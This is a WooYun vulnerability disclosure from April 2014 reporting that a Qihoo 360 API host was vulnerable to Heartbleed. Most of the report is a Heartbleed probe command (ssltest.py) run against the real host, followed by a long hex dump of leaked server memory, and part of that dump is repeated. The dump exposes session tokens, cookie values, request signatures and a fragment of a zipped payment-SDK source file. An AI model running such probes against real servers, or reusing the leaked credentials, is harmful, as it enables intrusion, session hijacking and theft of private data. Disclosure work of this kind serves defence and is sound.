当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-055945

漏洞标题:360某api运维不当导致敏感信息泄漏

相关厂商:奇虎360

漏洞作者: 马燕羊蝎子

提交时间:2014-04-08 16:28

修复时间:2014-04-10 20:06

公开时间:2014-04-10 20:06

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-04-08: 细节已通知厂商并且等待厂商处理中
2014-04-10: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

360某api运维不当导致敏感信息泄漏

详细说明:

http://drops.wooyun.org/papers/1381

python ssltest.py openapi.360.cn
Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 66
 ... received message: type = 22, ver = 0302, length = 4540
 ... received message: type = 22, ver = 0302, length = 331
 ... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
  0000: 02 40 00 02 01 00 09 74 66 A7 1B 18 50 CA B5 0A  .@.....tf...P...
  0010: C0 DF 45 94 B8 8B 97 0C 9A 1A D6 A2 5A 31 36 A2  ..E.........Z16.
  0020: 20 E1 64 77 2B 00 25 9C 59 7E C8 F3 D4 BB FD D8   .dw+.%.Y~......
  0030: BE 28 CD 52 EB 68 F1 B6 5E 27 80 43 3E 42 39 D9  .(.R.h..^'.C>B9.
  0040: 89 62 D3 E5 7D B2 75 52 54 CC 65 03 4E C9 C1 BE  .b..}.uRT.e.N...
  0050: 8A 33 97 4A DB 47 02 05 1F E4 D8 D0 8B 2B 31 46  .3.J.G.......+1F
  0060: A6 F6 69 B9 65 77 FD 69 E1 C0 83 9C DE 05 F1 64  ..i.ew.i.......d
  0070: 92 F0 42 04 44 F7 68 6E 7E D8 D2 A7 8D 7C 8B 99  ..B.D.hn~....|..
  0080: 6D FB E8 A2 D4 4E 2D 44 0C A2 AD 91 31 CB 19 EC  m....N-D....1...
  0090: E1 33 75 85 B3 C5 D0 36 75 30 70 37 00 10 B1 0B  .3u....6u0p7....
  00a0: 67 DA C6 22 B4 F5 72 0D 7D 59 71 09 1C 66 E7 ED  g.."..r.}Yq..f..
  00b0: 28 D4 45 68 80 62 B7 C5 1F 6D B0 30 07 A2 FD 29  (.Eh.b...m.0...)
  00c0: 79 B9 74 49 5E 32 52 A6 DA C9 52 59 56 E7 E2 17  y.tI^2R...RYV...
  00d0: C6 42 65 A4 77 F0 33 6D 9E EB 4E BF E2 1C DE 4E  .Be.w.3m..N....N
  00e0: 93 86 2D 10 F6 82 B2 14 38 16 6D 62 6D 6C 08 7E  ..-.....8.mbml.~
  00f0: 5B 1B 02 4F CB 15 3D 28 43 71 67 B2 10 0C EC 6F  [..O..=(Cqg....o
  0100: 77 59 5D 6B B7 FC 14 03 01 00 01 01 16 03 01 00  wY]k............
  0110: 30 14 00 00 0C 8F 82 FA 41 06 73 85 50 BD B8 21  0.......A.s.P..!
  0120: 46 4C 26 77 E2 B6 55 36 5F 77 4C 8C 36 F2 68 D3  FL&w..U6_wL.6.h.
  0130: 26 55 E1 DF DB 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B  &U..............
  0140: 0B 65 0D 0A 48 6F 73 74 3A 20 6F 70 65 6E 61 70  .e..Host: openap
  0150: 69 2E 33 36 30 2E 63 6E 0D 0A 43 6F 6E 6E 65 63  i.360.cn..Connec
  0160: 74 69 6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 76 65  tion: Keep-Alive
  0170: 0D 0A 0D 0A 89 EF C1 E0 6E A0 9B B6 95 15 62 3D  ........n.....b=
  0180: 1A B1 07 AE 3A CE C2 D5 07 07 07 07 07 07 07 07  ....:...........
  0190: 32 35 50 34 25 32 35 32 35 4F 36 25 32 35 32 35  25P4%2525O6%2525
  01a0: 4E 53 25 32 36 72 25 33 44 30 25 32 36 71 69 64  NS%26r%3D0%26qid
  01b0: 25 33 44 32 32 35 39 36 38 30 31 38 25 32 36 69  %3D225968018%26i
  01c0: 6D 25 33 44 31 5F 74 30 31 39 65 33 38 34 61 35  m%3D1_t019e384a5
  01d0: 32 64 62 38 62 39 63 37 66 25 32 36 73 25 33 44  2db8b9c7f%26s%3D
  01e0: 71 75 63 25 32 36 73 72 63 25 33 44 33 36 30 6D  quc%26src%3D360m
  01f0: 6F 62 69 6C 65 25 32 36 74 25 33 44 31 25 32 36  obile%26t%3D1%26
  0200: 6C 65 25 33 44 3B 54 3D 73 25 33 44 65 32 34 64  le%3D;T=s%3De24d
  0210: 34 65 36 61 33 30 30 38 61 32 62 31 30 64 61 37  4e6a3008a2b10da7
  0220: 33 36 31 34 33 39 30 30 65 38 31 32 25 32 36 74  36143900e812%26t
  0230: 25 33 44 31 33 39 35 38 33 31 34 35 39 25 32 36  %3D1395831459%26
  0240: 61 25 33 44 31 25 32 36 76 25 33 44 31 2E 30 25  a%3D1%26v%3D1.0%
  0250: 32 36 6C 6D 25 33 44 0D 0A 43 6F 6E 74 65 6E 74  26lm%3D..Content
  0260: 2D 4C 65 6E 67 74 68 3A 20 32 33 0D 0A 48 6F 73  -Length: 23..Hos
  0270: 74 3A 20 6F 70 65 6E 61 70 69 2E 33 36 30 2E 63  t: openapi.360.c
  0280: 6E 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 4B  n..Connection: K
  0290: 65 65 70 2D 41 6C 69 76 65 0D 0A 0D 0A 61 75 74  eep-Alive....aut
  02a0: 68 6F 72 69 7A 65 3D 73 64 6B 5F 62 79 5F 63 6F  horize=sdk_by_co
  02b0: 6F 6B 69 65 E9 64 C5 56 80 80 44 71 6D 8A 61 2E  okie.d.V..Dqm.a.
  02c0: 65 B5 7D 0F 8A F2 BD F2 07 07 07 07 07 07 07 07  e.}.............
  02d0: 66 42 69 53 41 72 6F 62 79 71 62 59 34 53 6D 34  fBiSArobyqbY4Sm4
  02e0: 4F 4D 73 35 25 32 42 4F 6E 43 4A 62 46 55 4B 48  OMs5%2BOnCJbFUKH
  02f0: 6F 49 4F 6F 38 73 4D 46 33 41 39 46 76 6E 58 6C  oIOo8sMF3A9FvnXl
  0300: 53 4D 30 46 6A 46 25 32 46 49 4E 66 78 4D 6D 6F  SM0FjF%2FINfxMmo
  0310: 39 62 4E 56 59 55 4F 54 46 65 51 4C 59 7A 25 32  9bNVYUOTFeQLYz%2
  0320: 42 73 33 30 6C 74 75 33 43 39 32 70 75 45 5A 4E  Bs30ltu3C92puEZN
  0330: 71 50 69 52 4E 30 64 34 4A 35 34 62 4C 59 6D 65  qPiRN0d4J54bLYme
  0340: 44 78 47 64 67 25 32 42 4D 77 71 35 6B 35 6D 5A  DxGdg%2BMwq5k5mZ
  0350: 71 71 69 44 44 68 33 41 4D 64 48 38 34 25 32 42  qqiDDh3AMdH84%2B
  0360: 42 46 4D 50 73 6D 6B 45 78 45 59 35 73 6C 75 76  BFMPsmkExEY5sluv
  0370: 77 46 59 42 75 39 49 31 48 64 39 35 4A 7A 36 6B  wFYBu9I1Hd95Jz6k
  0380: 6E 6E 4A 50 31 72 38 47 44 34 32 51 6C 34 38 57  nnJP1r8GD42Ql48W
  0390: 50 4F 62 25 32 42 34 43 50 66 4D 76 6A 67 31 37  POb%2B4CPfMvjg17
  03a0: 4C 56 57 47 58 41 35 6D 73 37 69 61 45 74 35 4A  LVWGXA5ms7iaEt5J
  03b0: 79 46 4B 44 6A 5A 25 32 46 36 33 4B 47 48 4F 45  yFKDjZ%2F63KGHOE
  03c0: 6D 5A 4E 50 77 55 77 33 67 42 4C 78 70 64 79 32  mZNPwUw3gBLxpdy2
  03d0: 52 6F 79 4B 56 41 63 69 55 78 67 67 41 48 62 36  RoyKVAciUxggAHb6
  03e0: 75 46 35 6B 65 73 25 32 46 48 59 64 67 4E 51 6B  uF5kes%2FHYdgNQk
  03f0: 35 50 25 32 42 67 67 6D 4A 7A 6F 44 47 34 70 6F  5P%2BggmJzoDG4po
  0400: 58 55 6D 71 32 37 4D 6C 78 74 39 70 5A 44 30 59  XUmq27Mlxt9pZD0Y
  0410: 36 67 25 32 42 50 44 71 44 41 4E 67 32 76 34 49  6g%2BPDqDANg2v4I
  0420: 56 79 6C 4B 79 46 59 46 55 6F 46 77 6A 71 47 6C  VylKyFYFUoFwjqGl
  0430: 33 35 68 63 5A 41 34 76 4F 39 75 37 54 47 44 52  35hcZA4vO9u7TGDR
  0440: 57 38 6E 71 44 6A 4B 67 78 74 6D 34 66 39 30 35  W8nqDjKgxtm4f905
  0450: 6C 73 78 45 47 54 4D 72 57 42 69 7A 78 76 58 42  lsxEGTMrWBizxvXB
  0460: 75 4D 4C 5A 69 35 6D 54 4D 52 52 31 35 25 32 46  uMLZi5mTMRR15%2F
  0470: 46 43 6F 44 4D 45 53 4D 48 69 30 4D 68 79 33 52  FCoDMESMHi0Mhy3R
  0480: 67 63 7A 6D 37 52 6A 50 45 44 39 51 25 33 44 25  gczm7RjPED9Q%3D%
  0490: 33 44 26 6B 3D 41 44 66 34 79 74 32 6F 5A 7A 46  3D&k=ADf4yt2oZzF
  04a0: 4D 79 54 6B 45 78 63 51 57 50 42 47 79 30 33 47  MyTkExcQWPBGy03G
  04b0: 53 39 41 30 69 48 53 4E 75 6C 42 33 64 72 67 36  S9A0iHSNulB3drg6
  04c0: 65 72 35 52 7A 4F 54 52 70 53 53 4D 54 75 55 33  er5RzOTRpSSMTuU3
  04d0: 6A 31 77 68 67 37 41 2D 41 4D 6A 32 41 67 4B 43  j1whg7A-AMj2AgKC
  04e0: 37 77 62 31 63 71 64 73 78 2D 33 66 75 4E 79 6D  7wb1cqdsx-3fuNym
  04f0: 5F 6E 7A 39 64 31 74 66 70 71 7A 34 48 6B 48 76  _nz9d1tfpqz4HkHv
  0500: 53 48 31 36 65 69 31 72 39 36 6B 46 33 53 63 78  SH16ei1r96kF3Scx
  0510: 56 2D 64 42 43 32 76 2D 75 4F 41 38 48 78 5A 52  V-dBC2v-uOA8HxZR
  0520: 6F 34 47 63 4C 32 2D 6C 70 55 71 54 7A 36 6C 37  o4GcL2-lpUqTz6l7
  0530: 34 2D 34 45 44 54 70 36 4D 74 5A 74 72 35 4F 61  4-4EDTp6MtZtr5Oa
  0540: 33 4C 42 61 59 32 45 34 45 5A 33 61 4E 76 42 6D  3LBaY2E4EZ3aNvBm
  0550: 77 4A 63 35 53 62 52 38 6F 49 75 64 59 43 48 65  wJc5SbR8oIudYCHe
  0560: 69 58 6E 53 36 4B 31 41 37 6F 62 4D 69 59 75 79  iXnS6K1A7obMiYuy
  0570: 54 62 61 52 51 7A 41 76 64 4B 36 6D 5A 77 74 64  TbaRQzAvdK6mZwtd
  0580: 58 74 43 39 68 7A 61 5F 6B 41 52 5F 58 5F 32 6B  XtC9hza_kAR_X_2k
  0590: 53 35 35 49 6B 32 78 43 35 2D 71 63 6D 49 70 35  S55Ik2xC5-qcmIp5
  05a0: 47 69 67 5A 36 4F 49 31 59 74 39 6A 76 52 67 77  GigZ6OI1Yt9jvRgw
  05b0: 47 64 6D 59 37 6C 57 71 74 62 41 57 4D 56 70 41  GdmY7lWqtbAWMVpA
  05c0: 56 48 33 58 32 65 5F 44 49 73 57 30 32 64 38 77  VH3X2e_DIsW02d8w
  05d0: 77 44 78 62 73 44 70 45 67 4C 76 6D 50 50 61 59  wDxbsDpEgLvmPPaY
  05e0: 68 45 55 64 61 31 30 53 6F 72 71 73 25 33 44 8A  hEUda10Sorqs%3D.
  05f0: D5 92 84 D2 2A 2B 3C 07 3F 6C B9 1A B3 CD A7 65  ....*+<.?l.....e
  0600: 4E E0 66 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  N.f.............
  0610: 63 BE 58 97 22 9E D7 34 59 06 06 06 06 06 06 06  c.X."..4Y.......
  0620: 32 74 6C 76 42 4A 4F 46 45 37 4E 43 5A 46 75 4E  2tlvBJOFE7NCZFuN
  0630: 61 2D 57 6B 33 68 5A 36 38 61 4A 48 33 52 75 76  a-Wk3hZ68aJH3Ruv
  0640: 59 6F 6D 39 46 36 63 68 4C 48 53 64 33 34 61 67  Yom9F6chLHSd34ag
  0650: 25 33 44 BC 03 7C EE 39 96 E8 5D 24 EA 5A 67 D6  %3D..|.9..]$.Zg.
  0660: 52 E0 15 59 4A C4 2F 08 08 08 08 08 08 08 08 08  R..YJ./.........
  0670: 49 F6 BC 94 DE B7 BF C3 EF D2 D4 C6 79 EA 07 51  I...........y..Q
  0680: 30 4F D9 52 E5 C0 3F 83 FE C9 D9 1F 60 45 7C 6B  0O.R..?.....`E|k
  0690: BF FA 88 40 2D CF 30 4F 4D 84 C4 E7 BD 84 EC 3A  ...@-.0OM......:
  06a0: 67 08 0D FB 57 FC AA AD A2 55 BC 8D 44 C0 4A 45  g...W....U..D.JE
  06b0: 5B 00 D1 5E 31 DE 04 7B 2D D0 50 1E 28 25 EE 16  [..^1..{-.P.(%..
  06c0: E9 C1 8D 64 0C 38 F0 0B D0 AE 63 DD F7 9D 90 8E  ...d.8....c.....
  06d0: 91 5A 13 DE CF 91 1C 4F EF 2A 46 EF C8 96 42 6B  .Z.....O.*F...Bk
  06e0: 78 0B 36 F0 2E 3E F0 35 EE A9 9B D8 1C 6E 4F DB  x.6..>.5.....nO.
  06f0: 40 E8 FE 03 C6 4F C3 4A 3D 92 3B A5 0D 56 40 AF  @....O.J=.;..V@.
  0700: 8E BD 36 F2 6C 00 B2 FE 2B 3C 1D F4 39 13 05 BD  ..6.l...+<..9...
  0710: AE 04 FA E9 4B E7 80 A8 21 95 8E 51 2F 33 76 22  ....K...!..Q/3v"
  0720: D7 0E 4C AE 9A C4 83 D4 02 F1 EB F2 50 32 E8 27  ..L.........P2.'
  0730: 45 B0 D4 C8 11 00 B4 45 39 E8 FD 06 13 D9 75 5C  E......E9.....u\
  0740: FA E8 E7 E0 C4 CA 05 EB 43 B5 AF D4 8F F8 C6 69  ........C......i
  0750: 74 4B 07 77 39 24 97 4B 75 5A E0 85 7C FA 2F 87  tK.w9$.KuZ..|./.
  0760: 0D 83 68 77 F2 0C 95 6D 98 A1 73 D8 96 60 0E F6  ..hw...m..s..`..
  0770: 95 99 02 42 11 F1 4B 0C A0 1C 97 3C A8 EB 65 1D  ...B..K....<..e.
  0780: C3 2D 5B AC DD 3D 66 62 63 35 36 62 65 37 61 33  .-[..=fbc56be7a3
  0790: 35 34 30 31 62 37 63 38 30 33 62 36 63 63 35 33  5401b7c803b6cc53
  07a0: 31 34 38 32 66 31 26 73 69 67 6E 5F 74 79 70 65  1482f1&sign_type
  07b0: 3D 6D 64 35 26 73 72 63 3D 51 68 6F 70 65 6E 73  =md5&src=Qhopens
  07c0: 64 6B 2D 31 2E 30 2E 30 25 33 42 64 65 66 61 75  dk-1.0.0%3Bdefau
  07d0: 6C 74 26 73 74 3D 25 37 42 25 32 32 75 69 25 32  lt&st=%7B%22ui%2
  07e0: 32 25 33 41 25 32 32 31 25 32 32 25 32 43 25 32  2%3A%221%22%2C%2
  07f0: 32 74 25 32 32 25 33 41 37 37 38 31 37 25 37 44  2t%22%3A77817%7D
  0800: EA BB 12 53 DA 15 A5 75 5D 50 FD 61 21 6F B2 D5  ...S...u]P.a!o..
  0810: 69 7A DA B1 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B  iz..............
  0820: CB 91 5C 69 18 C2 4E 9F 73 4E E3 4B 03 23 F3 3C  ..\i..N.sN.K.#.<
  0830: DD 0C 5D 6E C7 9F 5C 46 AC 98 B1 5F 8E E3 22 18  ..]n..\F..._..".
  0840: 83 FE 9D 67 80 20 6A 0F 58 40 3B E1 10 56 E3 04  ...g. j.X@;..V..
  0850: AD E9 32 7F 0D 2D 55 10 AC 81 CC FA C0 05 FF 50  ..2..-U........P
  0860: 14 94 76 4A 9A FE 6F 10 BC F5 DE 7A 01 12 7C 9B  ..vJ..o....z..|.
  0870: 21 AB DB 5B A7 30 F2 63 B4 B8 A4 F2 44 99 16 F5  !..[.0.c....D...
  0880: C3 18 27 26 76 39 CE 9F 24 F4 58 2F E0 36 13 F4  ..'&v9..$.X/.6..
  0890: DC 8C 4A 56 82 E5 FB 0A 35 CA 4F 1C D1 F1 CB 8F  ..JV....5.O.....
  08a0: FB DE 28 EE FD EF 64 D5 E4 6F A6 BD 32 7F 7D 42  ..(...d..o..2.}B
  08b0: 33 DE 8B AA E6 41 80 61 98 55 B5 6B 5A 0B 2A 45  3....A.a.U.kZ.*E
  08c0: C4 C8 E4 3E 01 FB 5F FF F3 02 E0 5F 05 44 4D 27  ...>.._...._.DM'
  08d0: 61 BA B4 34 8B 53 5C 01 CE 03 03 A0 C4 79 7B DF  a..4.S\......y{.
  08e0: 5F D9 1D 02 D9 84 E8 31 F3 42 3D A1 9E 1D 39 07  _......1.B=...9.
  08f0: A4 03 2E CF E0 16 82 94 84 F4 36 3C B8 7D 72 7A  ..........6<.}rz
  0900: 9A 75 8E 93 EC 28 93 91 12 D3 87 F6 7D 0A 6F B4  .u...(......}.o.
  0910: 7C 0F 62 C0 A4 D9 67 EA 1F DB 64 5D E6 EA 69 C7  |.b...g...d]..i.
  0920: 19 88 B5 97 30 17 03 01 00 20 F3 AE 8B 32 19 99  ....0.... ...2..
  0930: B4 DB 69 CA DA 43 C7 82 63 D4 9A 5D 7B 02 2A 44  ..i..C..c..]{.*D
  0940: 5D 98 03 74 7D 71 98 9E 84 90 C2 5E 78 FD 7B C2  ]..t}q.....^x.{.
  0950: 3C 44 45 02 6C 5E 01 FF 8E D2 DE 99 89 F8 68 68  <DE.l^........hh
  0960: F0 A9 B1 69 18 63 29 46 45 6E 16 C8 74 7B F2 1A  ...i.c)FEn..t{..
  0970: 5E C2 7C C2 67 D5 5D 73 68 30 56 D0 22 21 C9 99  ^.|.g.]sh0V."!..
  0980: 52 B7 A1 7D 8B 9B C3 34 9E FA 92 10 F2 08 95 95  R..}...4........
  0990: 96 0F 5B 08 34 84 EF 22 D7 69 A3 AF E1 A4 29 33  ..[.4..".i....)3
  09a0: 2B 89 B5 41 7E 20 D7 58 39 9F A8 D0 89 90 BE 87  +..A~ .X9.......
  09b0: 75 36 13 E7 57 8E 92 85 02 FE A3 C6 F5 62 4D B9  u6..W........bM.
  09c0: B6 99 B5 A5 2B 40 44 C1 C9 DD D1 8D FD F7 6D 01  ....+@D.......m.
  09d0: 6A 36 16 AE 88 3F 3F 06 C7 2E 2A FA 57 90 F8 33  j6...??...*.W..3
  09e0: 80 41 7F 05 B1 BF 02 F4 8F 60 F2 8F 82 6F F0 C5  .A.......`...o..
  09f0: 2B 2B 98 B9 99 D9 3B 59 03 FE EA 82 FD CF 76 7F  ++....;Y......v.
  0a00: 1D A8 9B 79 3B B9 BB 89 3C B0 F9 A3 E0 FC 0F 00  ...y;...<.......
  0a10: 88 E8 DB 58 7A 5A 22 B5 91 96 56 96 48 4B C7 27  ...XzZ"...V.HK.'
  0a20: BF E7 43 40 17 2A CA 21 17 37 4B 5C 6E F4 8F 6C  ..C@.*.!.7K\n..l
  0a30: AF DF 15 00 62 87 88 02 40 7F FF D8 A1 E2 E2 62  ....b...@......b
  0a40: E2 EC 56 D7 FE 36 51 28 FB 5F 67 1C FF 32 30 44  ..V..6Q(._g..20D
  0a50: 54 02 0A BA 64 50 89 7F D9 9F 0A 87 88 5D 34 10  T...dP.......]4.
  0a60: F8 A2 81 41 E2 50 F0 C5 3E 44 41 70 09 F1 8B 06  ...A.P..>DAp....
  0a70: 06 8B 5E CA 13 83 40 24 2E 18 18 0E 86 C2 2E F6  ..^...@$........
  0a80: 0B 01 41 21 17 4D EC F7 D6 97 F2 C4 40 D0 0B 26  ..A!.M......@..&
  0a90: 2A 01 17 97 B8 6C 30 F0 45 83 81 E0 B0 4B F6 FB  *....l0.E....K..
  0aa0: 05 2F 99 28 F4 72 1E 54 4C FC 82 41 C4 C4 44 45  ./.(.r.TL..A..DE
  0ab0: 2F 19 08 74 D9 C4 2F 3E 17 51 10 04 0A 11 BB 64  /..t../>.Q.....d
  0ac0: 60 A8 F8 25 83 41 60 17 4C 1C 22 0A 93 B8 68 62  `..%.A`.L."...hb
  0ad0: 30 31 C8 A5 3C 31 38 F8 E2 58 42 45 45 C5 2F 8D  01..<18..XBEE./.
  0ae0: 2F 1C 7C C9 A0 E2 D0 CB E3 FB FB 1D 5E 1A 5F B0  /.|.........^._.
  0af0: 04 EC A2 41 C0 30 F0 25 03 C1 2F 99 38 48 02 7E  ...A.0.%../.8H.~
  0b00: 69 6E C0 E1 97 0D 06 BA 68 62 20 28 FC F2 1C 87  in......hb (....
  0b10: FD 73 1E B8 21 CD 7E DF D6 81 FC 73 A9 3D B0 41  .s..!.~....s.=.A
  0b20: 59 FE B1 8E 44 54 1D AD 9C D8 45 FF 5A C6 BA 4E  Y...DT....E.Z..N
  0b30: 4E 6E EC E0 BF FE AB 2A 22 A4 44 E5 41 0A 70 39  Nn.....*".D.A.p9
  0b40: E8 EF 8F 48 19 22 2F 27 AF 20 01 15 87 40 C4 14  ...H."/'. ...@..
  0b50: 61 8A 20 05 18 58 5E 5E 5E FA FF 33 FE 7C 99 B8  a. ..X^^^..3.|..
  0b60: BA 99 21 DD FE 5C BB BF DF 12 1C 24 06 E0 E2 52  ..!..\.....$...R
  0b70: D2 52 06 FC 06 50 4B 03 04 14 00 00 00 00 00 CF  .R...PK.........
  0b80: 95 79 44 00 00 00 00 00 00 00 00 00 00 00 00 09  .yD.............
  0b90: 00 00 00 6A 61 76 61 2F 73 72 63 2F 50 4B 03 04  ...java/src/PK..
  0ba0: 14 00 00 00 00 00 CF 95 79 44 00 00 00 00 00 00  ........yD......
  0bb0: 00 00 00 00 00 00 0F 00 00 00 6A 61 76 61 2F 73  ..........java/s
  0bc0: 72 63 2F 71 69 68 6F 6F 2F 50 4B 03 04 14 00 00  rc/qihoo/PK.....
  0bd0: 00 00 00 CF 95 79 44 00 00 00 00 00 00 00 00 00  .....yD.........
  0be0: 00 00 00 14 00 00 00 6A 61 76 61 2F 73 72 63 2F  .......java/src/
  0bf0: 71 69 68 6F 6F 2F 6D 73 64 6B 2F 50 4B 03 04 14  qihoo/msdk/PK...
  0c00: 00 00 00 08 00 FA 90 6A 44 C9 67 5B 2A DE 04 00  .......jD.g[*...
  0c10: 00 32 0E 00 00 1C 00 00 00 6A 61 76 61 2F 73 72  .2.......java/sr
  0c20: 63 2F 71 69 68 6F 6F 2F 6D 73 64 6B 2F 50 61 79  c/qihoo/msdk/Pay
  0c30: 2E 6A 61 76 61 B5 56 59 AB D3 40 14 7E AE E0 7F  .java.VY..@.~...
  0c40: 18 F3 94 48 49 15 C1 07 AB A2 62 C5 BA 5D B1 2A  ...HI.....b..].*
  0c50: 88 48 19 D3 69 3B 9A 26 71 32 B9 5A 54 50 11 37  .H..i;.&q2.ZTP.7
  0c60: 5C 41 41 45 11 77 F1 41 11 14 1F 7C F0 CF D8 78  \AAE.w.A...|...x
  0c70: FD 17 9E D9 B2 B5 75 01 BD DC 86 E4 9C EF EC CB  ......u.........
  0c80: 4C 63 E5 CA E5 CB D0 4A 24 1E 0D 78 2E 5F 16 61  Lc.....J$..x._.a
  0c90: EF 38 1E 10 74 82 0E C3 D0 1D C5 BD E3 4D 41 A6  .8..t........MA.
  0ca0: A3 28 64 1C 1D C3 8B D8 A5 A1 DB 5E 68 9D F2 48  .(d........^h..H
  0cb0: C4 69 18 34 CB CC 84 53 DF DD CC 18 1E EF A2 31  .i.4...S.......1
  0cc0: 9F CB 8C 67 71 B6 E3 78 B8 1B 47 B3 58 6D 4E 18  ...gq..x..G.XmN.
  0cd0: E6 21 CB 79 01 E1 EE 88 06 B4 47 16 DD 63 71 18  .!.y......G..cq.
  0ce0: B8 3B 3A 0B 7B 16 8E 1E 23 1E FF 05 28 C2 2C 26  .;:.{...#...(.,&
  0cf0: 4C 62 F7 CA D7 DF 63 25 6E 3A 5C 95 21 00 8D 71  Lb....c%n:\.!..q
  0d00: 14 01 68 BC 39 8A DA 01 B8 D9 C7 1E 69 CA 54 26  ..h.9.......i.T&
  0d10: 47 7D EA 21 CF C7 71 8C 00 80 4E 0B 6A 2D 62 74  G}.!..q...N.j-bt
  0d20: 11 73 82 62 8E 39 B0 FB 34 C0 3E EA 70 46 83 01  .s.b.9..4.>.pF..
  0d30: 3A D8 DA D7 DE 76 A8 7B 60 DF 2E B4 01 59 43 CE  :....v.{`....YC.
  0d40: A3 75 8D 86 28 82 3B 0A 8F 52 9F 8C DC 35 6B 57  .u..(.;..R...5kW
  0d50: B9 5E D0 00 B3 8D 90 F5 08 EB 2E 12 46 FB 63 E9  .^..........F.c.
  0d60: B1 D5 FC 13 F5 ED D6 56 A1 5C CA 51 D2 2B 0A 19  .......V.\.Q.+..
  0d70: 5C 17 42 DA 49 C6 73 38 1D E2 31 C2 8B CC 4A F4  \.B.I.s8..1...J.
  0d80: A8 1B 49 82 80 CC 50 41 18 0B D9 EE 78 20 BC 10  ..I...PA....x ..
  0d90: D6 01 A2 52 25 F4 D8 55 5D 4A 95 23 92 57 AB F1  ...R%..U]J.#.W..
  0da0: 21 8D 5D AD 1D C4 B5 99 8C A3 FD CE 38 EE 80 F0  !.].........8...
  0db0: CD 92 64 3B 39 2A 8F A1 0C 34 54 85 3D 2B 1D 93  ..d;9*...4T.=+..
  0dc0: 03 52 83 09 99 BC B8 F8 FD F6 A5 6F 5F 6E 42 01  .R.........o_nB.
  0dd0: 96 BE 5E 4E 1F BF FC FE F0 62 7A F7 FD B7 2F F7  ..^N.....bz.../.
  0de0: 97 DE 3D 9B DC B8 F7 E3 DC C3 EF 4F 5E 2E BD FF  ..=........O^...
  0df0: 9C 7E B8 A0 44 36 41 03 E1 11 92 CF 58 93 40 7D  .~..D6A.....X.@}
  0e00: C2 02 24 BF 1A 59 E0 26 35 11 0B 3D 12 C7 FB C8  ..$..Y.&5..=....
  0e10: 89 84 C4 DC D6 F3 B0 5E 71 EB 1A B5 51 6B 94 29  .......^q...Qk.)
  0e20: 11 41 D1 3E B2 57 A8 C8 68 7C 10 FB B4 67 14 68  .A.>.W..h|...g.h
  0e30: A0 4A 9E 00 6A 5C 56 02 97 C6 AD 51 C4 21 3D 8E  .J..j\V....Q.!=.


2E68028E-B4B9-41F0-99EC-001BB9E93588.png

漏洞证明:

http://drops.wooyun.org/papers/1381

python ssltest.py openapi.360.cn
Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 66
 ... received message: type = 22, ver = 0302, length = 4540
 ... received message: type = 22, ver = 0302, length = 331
 ... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
  0000: 02 40 00 02 01 00 09 74 66 A7 1B 18 50 CA B5 0A  .@.....tf...P...
  0010: C0 DF 45 94 B8 8B 97 0C 9A 1A D6 A2 5A 31 36 A2  ..E.........Z16.
  0020: 20 E1 64 77 2B 00 25 9C 59 7E C8 F3 D4 BB FD D8   .dw+.%.Y~......
  0030: BE 28 CD 52 EB 68 F1 B6 5E 27 80 43 3E 42 39 D9  .(.R.h..^'.C>B9.
  0040: 89 62 D3 E5 7D B2 75 52 54 CC 65 03 4E C9 C1 BE  .b..}.uRT.e.N...
  0050: 8A 33 97 4A DB 47 02 05 1F E4 D8 D0 8B 2B 31 46  .3.J.G.......+1F
  0060: A6 F6 69 B9 65 77 FD 69 E1 C0 83 9C DE 05 F1 64  ..i.ew.i.......d
  0070: 92 F0 42 04 44 F7 68 6E 7E D8 D2 A7 8D 7C 8B 99  ..B.D.hn~....|..
  0080: 6D FB E8 A2 D4 4E 2D 44 0C A2 AD 91 31 CB 19 EC  m....N-D....1...
  0090: E1 33 75 85 B3 C5 D0 36 75 30 70 37 00 10 B1 0B  .3u....6u0p7....
  00a0: 67 DA C6 22 B4 F5 72 0D 7D 59 71 09 1C 66 E7 ED  g.."..r.}Yq..f..
  00b0: 28 D4 45 68 80 62 B7 C5 1F 6D B0 30 07 A2 FD 29  (.Eh.b...m.0...)
  00c0: 79 B9 74 49 5E 32 52 A6 DA C9 52 59 56 E7 E2 17  y.tI^2R...RYV...
  00d0: C6 42 65 A4 77 F0 33 6D 9E EB 4E BF E2 1C DE 4E  .Be.w.3m..N....N
  00e0: 93 86 2D 10 F6 82 B2 14 38 16 6D 62 6D 6C 08 7E  ..-.....8.mbml.~
  00f0: 5B 1B 02 4F CB 15 3D 28 43 71 67 B2 10 0C EC 6F  [..O..=(Cqg....o
  0100: 77 59 5D 6B B7 FC 14 03 01 00 01 01 16 03 01 00  wY]k............
  0110: 30 14 00 00 0C 8F 82 FA 41 06 73 85 50 BD B8 21  0.......A.s.P..!
  0120: 46 4C 26 77 E2 B6 55 36 5F 77 4C 8C 36 F2 68 D3  FL&w..U6_wL.6.h.
  0130: 26 55 E1 DF DB 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B  &U..............
  0140: 0B 65 0D 0A 48 6F 73 74 3A 20 6F 70 65 6E 61 70  .e..Host: openap
  0150: 69 2E 33 36 30 2E 63 6E 0D 0A 43 6F 6E 6E 65 63  i.360.cn..Connec
  0160: 74 69 6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 76 65  tion: Keep-Alive
  0170: 0D 0A 0D 0A 89 EF C1 E0 6E A0 9B B6 95 15 62 3D  ........n.....b=
  0180: 1A B1 07 AE 3A CE C2 D5 07 07 07 07 07 07 07 07  ....:...........
